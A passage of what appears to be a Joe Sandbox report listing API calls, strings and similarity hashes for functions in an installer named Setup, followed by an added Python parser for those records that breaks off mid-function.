• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8Throw
• String ID: Blockers$Configuration$EnterMaintenanceModeIf$Items$ParameterInfo.xml$Setup$SystemCheck$schema validation failure: wrong number of child elements under top level Setup element
• API String ID: 2489616738-3586895666
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D86447
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D7A1FF: __EH_prolog3_catch.LIBCMT ref: 69D7A206
• __CxxThrowException@8.LIBCMT ref: 69D86666
  • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
  • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
Strings
• schema validation failure: If URL is present then there must be a DownloadSize, xrefs: 69D865DA
• URL, xrefs: 69D86453
• schema validation failure: If HashValue is present then it must be a 64 hex-digit string, xrefs: 69D8667A
• CompressedDownloadSize, xrefs: 69D86571
• DownloadSize, xrefs: 69D864E3
• CompressedHashValue, xrefs: 69D8652C
• HashValue, xrefs: 69D8649E
• ParameterInfo.xml, xrefs: 69D865E8, 69D86688
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8H_prolog3_catchThrow
• String ID: CompressedDownloadSize$CompressedHashValue$DownloadSize$HashValue$ParameterInfo.xml$URL$schema validation failure: If HashValue is present then it must be a 64 hex-digit string$schema validation failure: If URL is present then there must be a DownloadSize
• API String ID: 24280941-3047338099
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB6789
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DB988C: __EH_prolog3.LIBCMT ref: 69DB9893
  • Part of subcall function 69DB988C: GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
  • Part of subcall function 69DB988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
  • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
  • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
  • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
  • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
• CoInitialize.OLE32(00000000), ref: 69DB67DD
• CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,69DAFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,69DB36D8,02602230,?,00000000), ref: 69DB67FB
• __CxxThrowException@8.LIBCMT ref: 69DB6A24
• CoUninitialize.OLE32(?,69DEBE00,?,?,?,UiInfo.xml,?,00000000,00000044,69DB36D8,02602230,?,00000000,?), ref: 69DB6A3A
• SysFreeString.OLEAUT32(?), ref: 69DB6A43
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8PathRelativeThrow$CommandCreateFileFreeInitializeInstanceLineModuleNameStringUninitialize
• String ID: LCIDHints$ParameterInfo.xml$UiInfo.xml$Xml Document load failure
• API String ID: 2432735026-2443555527
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D79F3B
• VariantInit.OLEAUT32(00000003), ref: 69D79F49
• SysFreeString.OLEAUT32(?), ref: 69D79F83
  • Part of subcall function 69DB964C: __get_errno.LIBCMT ref: 69DB966C
  • Part of subcall function 69DB964C: __wcstoui64.LIBCMT ref: 69DB968F
  • Part of subcall function 69DB964C: __get_errno.LIBCMT ref: 69DB96A1
• __ui64tow_s.LIBCMT ref: 69D79FEF
• __CxxThrowException@8.LIBCMT ref: 69D7A0BC
• SysAllocString.OLEAUT32(00000000), ref: 69D7A0C2
• VariantClear.OLEAUT32(?), ref: 69D7A0E9
Strings
• schema validation failure: %s is invalid, a non-negitive numeric value is required for %s, xrefs: 69D7A03C
• schema validation failure: attribute %s missing for %s %s, xrefs: 69D7A17B
• Name, xrefs: 69D7A121
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: StringVariant__get_errno$AllocClearException@8FreeH_prolog3InitThrow__ui64tow_s__wcstoui64
• String ID: Name$schema validation failure: %s is invalid, a non-negitive numeric value is required for %s$schema validation failure: attribute %s missing for %s %s
• API String ID: 1723289333-1070666262
                                                                                                                                                                    • Opcode ID: 448e36fd7b942367578d6cb23607bc5846e4fa0f46ea80ab0518c86113a39e2e
                                                                                                                                                                    • Instruction ID: 9b6dbfc209be14973580cda6268929d5e6c660a02d2b893e10b00ceeeeadb791
                                                                                                                                                                    • Opcode Fuzzy Hash: 448e36fd7b942367578d6cb23607bc5846e4fa0f46ea80ab0518c86113a39e2e
                                                                                                                                                                    • Instruction Fuzzy Hash: D3915B75900249EFDF01DFE8C944AEEBBB9BF09318F148569E815EB691DB30DA04CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,69D6A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 69D7AA49
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7AA97
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 69D7AAAC
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7AB2C
                                                                                                                                                                    Strings
                                                                                                                                                                    • ReadXML failed to open XML file %s, with error %d, xrefs: 69D7AA07
                                                                                                                                                                    • Could not find mandatory data file %s. This is a bad package., xrefs: 69D7AAE5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$H_prolog3$AllocChangeCloseException@8FindModuleNameNotificationPathPointerReadRelativeStringThrow
                                                                                                                                                                    • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                                                                                                    • API String ID: 956789720-4172873023
                                                                                                                                                                    • Opcode ID: 9a878aa10b760c3d57f3fde2d4f17f4544b7c0047cc3d7a8a8b7c6a70f198bc7
                                                                                                                                                                    • Instruction ID: ac464039b7fa47f649f7937bf30df092be4946d45a9ddf3547634b3fb7c0d155
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a878aa10b760c3d57f3fde2d4f17f4544b7c0047cc3d7a8a8b7c6a70f198bc7
                                                                                                                                                                    • Instruction Fuzzy Hash: B8814B75900249EFDF10DFA4C984EAEBBB9FF49314F108529E511BB690C7349A15CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E31A7
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • _wcschr.LIBCMT ref: 698E31E8
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698E32A2
                                                                                                                                                                      • Part of subcall function 698FDBDB: RaiseException.KERNEL32(?,?,698F9236,?,?,?,?,?,698F9236,?,69907F54,699122B4), ref: 698FDC1D
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,698F6F33,?,?,00000000,00000044,698F668B,?,00000000,00000000,?,?,succeeded), ref: 698E32B9
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E32C6
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,00000000,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698E3307
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E330A
                                                                                                                                                                      • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
                                                                                                                                                                      • Part of subcall function 698DCAC2: __EH_prolog3.LIBCMT ref: 698DCAC9
                                                                                                                                                                      • Part of subcall function 698DD170: __EH_prolog3.LIBCMT ref: 698DD177
                                                                                                                                                                    Strings
                                                                                                                                                                    • UIInfo.xml, xrefs: 698E3234
                                                                                                                                                                    • UiInfo.xml has INVALID ResourceDLLName %s, xrefs: 698E3222
                                                                                                                                                                    • Successfuly found file %s , xrefs: 698E3341
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Path$ExistsFile$ExceptionException@8RaiseRelativeThrow_wcschr
                                                                                                                                                                    • String ID: Successfuly found file %s $UIInfo.xml$UiInfo.xml has INVALID ResourceDLLName %s
                                                                                                                                                                    • API String ID: 1926448744-2896109536
                                                                                                                                                                    • Opcode ID: 3ecaa95dac6810ca4c487b0c8875a43fca82b37812876cd6df2903b07db7e85b
                                                                                                                                                                    • Instruction ID: 2b2fb5d9c45e1bdde7b3c46bab4bd33a9d9968a9a327484b260d573bc2434e73
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ecaa95dac6810ca4c487b0c8875a43fca82b37812876cd6df2903b07db7e85b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4571907580014DEFCF00DBE8C984AEEBBB8BF16318F549959E451A7291DB31DA09CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DAA796
                                                                                                                                                                      • Part of subcall function 69D7C5D4: __EH_prolog3.LIBCMT ref: 69D7C5DB
                                                                                                                                                                      • Part of subcall function 69D7C5D4: GetLastError.KERNEL32 ref: 69D7C609
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA83B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA8F4
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA95B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to record PackageVersion, xrefs: 69DAA7F7
                                                                                                                                                                    • Failed to record PackageName, xrefs: 69DAA7B8
                                                                                                                                                                    • Failed to record DisplayedLcidId, xrefs: 69DAA855
                                                                                                                                                                    • Failed to record InstallerVersion, xrefs: 69DAA8B0
                                                                                                                                                                    • Failed to record IsRetailBuild, xrefs: 69DAA975
                                                                                                                                                                    • Failed to record PatchType, xrefs: 69DAA90E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3Last
                                                                                                                                                                    • String ID: Failed to record DisplayedLcidId$Failed to record InstallerVersion$Failed to record IsRetailBuild$Failed to record PackageName$Failed to record PackageVersion$Failed to record PatchType
                                                                                                                                                                    • API String ID: 685212868-335235891
                                                                                                                                                                    • Opcode ID: 13bc51c731fd0e5642911a329c042381562ccb632e055f171ab7eb9684d28af9
                                                                                                                                                                    • Instruction ID: 150d80cee20230f422c86921e308078bb3cc5c3f4ae1404c4dacc46ba7fcd880
                                                                                                                                                                    • Opcode Fuzzy Hash: 13bc51c731fd0e5642911a329c042381562ccb632e055f171ab7eb9684d28af9
                                                                                                                                                                    • Instruction Fuzzy Hash: A8518C7A500248EFDB10DFA4CA45E8E3BAABF45368F508538B915DBA90C774DA11CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB007D
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,02602230,02602230,02602230,02602230,00000050,69DA93A7,?,UserControlled,?,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C), ref: 69DB010B
                                                                                                                                                                    • SqmIsWindowsOptedIn.SQMAPI(?,UserControlled,?,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C,02602254,?,?,?,?,?,?), ref: 69DB0121
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DB01CB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Exception@8H_prolog3InfoOptedSystemThrowWindows
• String ID: AlwaysUploaded$Disabled$OSControlled$ParameterInfo.xml$UserControlled$schema validation failure: Invalid Policy Value being defined.
• API String ID: 3692811390-1543467451
• Opcode ID: db757b25402b731988add7eb31ae1a3d299323d8a907a1c22787164e593cf590
• Instruction ID: de5b7d0fc012e9973f6cbca2e7640e94e19aca0c61de105993b88b52e9c9a92a
• Opcode Fuzzy Hash: db757b25402b731988add7eb31ae1a3d299323d8a907a1c22787164e593cf590
• Instruction Fuzzy Hash: 5041D875900149DFCB14DBE8C944BDDB7B9AF16358F008235E815EFA85DB30DA448BB1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 69D7C53D: GetLastError.KERNEL32(?,69DAA320,F0D05EFD,?,?), ref: 69D7C55E
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
• GetLastError.KERNEL32 ref: 69DAA393
• GetLastError.KERNEL32 ref: 69DAA434
• GetLastError.KERNEL32 ref: 69DAA4A7
• GetLastError.KERNEL32 ref: 69DAA511
• GetLastError.KERNEL32 ref: 69DAA5A5
Strings
• Failed to record SetUserId, xrefs: 69DAA3C0
• Failed to record StartupAppid, xrefs: 69DAA4C1
• Failed to record StartSession, xrefs: 69DAA322
• Failed to record current state name, xrefs: 69DAA52B
• Failed to record MPC, xrefs: 69DAA5BB
• Failed to record SetMachineId, xrefs: 69DAA461
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: Failed to record MPC$Failed to record SetMachineId$Failed to record SetUserId$Failed to record StartSession$Failed to record StartupAppid$Failed to record current state name
• API String ID: 3502553090-2804495384
• Opcode ID: bae761830b9203b8b3aecc739a866df88f24d8f128ef8652bfd2f7b75172b1d4
• Instruction ID: f131e73cee6b0d64b04b4de7707836608a5fc676a4c11bc4e07cff1d1c2ae517
• Opcode Fuzzy Hash: bae761830b9203b8b3aecc739a866df88f24d8f128ef8652bfd2f7b75172b1d4
• Instruction Fuzzy Hash: F0A19E71208242DFD720DF64C945A5F7BE9BF443A4F005A3CF4A6CB6A1D775D9088BA2
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D9212E
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
• __CxxThrowException@8.LIBCMT ref: 69D92484
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8Throw
• String ID: CopyPackageFilesToDownloadLocation$DelayBetweenRetries$DownloadRetries$Items$No items found. The package must contain at least one item.$ParameterInfo.xml$true
• API String ID: 2489616738-2573507987
• Opcode ID: a44a0e996b51402cfc0b2fcb4bc718a5941b4ecadbf8675c74468da264e63b81
• Instruction ID: 053cebae4a6d392841c0d07ee523f981452881e587a6351a90da2e43f730cc4e
• Opcode Fuzzy Hash: a44a0e996b51402cfc0b2fcb4bc718a5941b4ecadbf8675c74468da264e63b81
• Instruction Fuzzy Hash: 46D12D74900249DFCF01DFA8C984AAEBBB9BF49318F1481A9E515EB791C734DA05CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 69A73302
  • Part of subcall function 69A73679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,69A7332F,?), ref: 69A73683
  • Part of subcall function 69A73679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,69A7332F,?), ref: 69A736B3
  • Part of subcall function 69A73679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 69A736D5
  • Part of subcall function 69A73679: FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,69A7332F,?), ref: 69A736E0
• EnterCriticalSection.KERNEL32(69A90168,?), ref: 69A73334
• LeaveCriticalSection.KERNEL32(69A90168,00000400,?), ref: 69A733F5
• LocalFree.KERNEL32(00000000), ref: 69A7340C
• SetLastError.KERNEL32(00000057), ref: 69A7341F
  • Part of subcall function 69A717EB: malloc.MSVCRT ref: 69A717F6
• ctype.LIBCPMT ref: 69A7EDDC
  • Part of subcall function 69A7343E: GetSystemTime.KERNEL32(00000000,00000838,00000000), ref: 69A7347D
  • Part of subcall function 69A7343E: SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 69A7348B
  • Part of subcall function 69A730D2: InterlockedIncrement.KERNEL32(00000000), ref: 69A730D8
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
• Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
Similarity
• API ID: Time$CriticalProcessSectionSystem$ChangeCloseConvertCurrentEnterErrorFileFindFreeIncrementInterlockedLastLeaveLocalNotificationOpenStringTokenctypemallocmemset
• String ID: %s_%s$W
• API String ID: 1092980461-4070589124
• Opcode ID: 2fca1214d22e6e24d0bc12a1a5f82db32f86813869208719c74dcced1cb7c7c8
• Instruction ID: fd91d8ff6e440254c04c93cf20b918803dbac15982e9ba4d1673540f77d743cb
• Opcode Fuzzy Hash: 2fca1214d22e6e24d0bc12a1a5f82db32f86813869208719c74dcced1cb7c7c8
• Instruction Fuzzy Hash: DEC1BF39850358AFDB71CF14CE86BEA7AF9BF40B44F15C094A895AE161CF718AC58F90
Uniqueness
Uniqueness Score: -1.00%
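The function records in this part of the report (the APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity blocks) are printed as text only, which makes questions such as "which functions in the dumped Setup module reach OpenProcessToken or ConvertSidToStringSidW, and only through a subcall?" tedious to answer by hand. The parser below is an added example and not part of this Joe Sandbox report or of Joe Sandbox's own tooling; it turns the records into structured objects and offers two typical queries (API reachability, grouping by Instruction Fuzzy Hash for pivoting across dumps). The record layout and field names follow what is printed on this page; the sample input is constructed from lines copied from the records above; deriving the module name from the tail of the snapshot file name is an assumption.

```python
# Added example, not Joe Sandbox's own code: parse the per-function records shown in this report
# (APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity blocks) into queryable objects.
from __future__ import annotations
import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?(\S+?)(?:\(([^)]*)\))?,?\s+ref:\s*([0-9A-Fa-f]+)$")

@dataclass
class ApiRef:
    name: str               # "GetLastError.KERNEL32"
    args: list[str]         # as printed; "?" marks an unresolved argument
    ref: int                # call-site address
    subcall_of: int | None  # set when the call sits inside a callee of this function

@dataclass
class FunctionRecord:
    apis: list[ApiRef] = field(default_factory=list)
    strings: dict[str, list[int]] = field(default_factory=dict)  # string -> xref addresses
    dump: dict[str, str] = field(default_factory=dict)           # Source File / Offset / based on PE
    snapshot_file: str = ""
    similarity: dict[str, str] = field(default_factory=dict)     # API ID, Opcode ID, fuzzy hashes, ...

    @property
    def module_name(self) -> str:
        # Assumption: snapshot names end in "_<module>.jbxd", e.g. hcaresult_4_2_69d50000_Setup.jbxd
        return self.snapshot_file.rsplit("_", 1)[-1].removesuffix(".jbxd")

def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":          # every record opens with its APIs block
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None:                 # tail of a record cut off before the first "APIs"
            continue
        body = line.lstrip("•").strip()
        if section == "APIs" and (m := API_RE.match(body)):
            sub, name, args, ref = m.groups()
            rec.apis.append(ApiRef(name, args.split(",") if args else [], int(ref, 16), int(sub, 16) if sub else None))
        elif section == "Strings":
            value, _, xrefs = body.rpartition(", xrefs: ")
            if xrefs:
                rec.strings[value] = [int(x, 16) for x in xrefs.split(",")]
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            rec.dump.update(part.partition(": ")[::2] for part in body.split(", "))
        elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File:"):
            rec.snapshot_file = body.partition(":")[2].strip()
        elif section == "Similarity":
            key, _, val = body.partition(": ")
            rec.similarity[key] = val
    return records

def functions_calling(records, api_prefix: str, include_subcalls: bool = True) -> list[tuple[str, int]]:
    """(module, call-site address) for every API entry whose name starts with api_prefix."""
    return [(r.module_name, a.ref) for r in records for a in r.apis
            if a.name.startswith(api_prefix) and (include_subcalls or a.subcall_of is None)]

def group_by(records, key: str = "Instruction Fuzzy Hash") -> dict[str, list[FunctionRecord]]:
    """Group records by a Similarity field; the fuzzy hashes are what one pivots on across reports."""
    out: dict[str, list[FunctionRecord]] = {}
    for r in records:
        if v := r.similarity.get(key):
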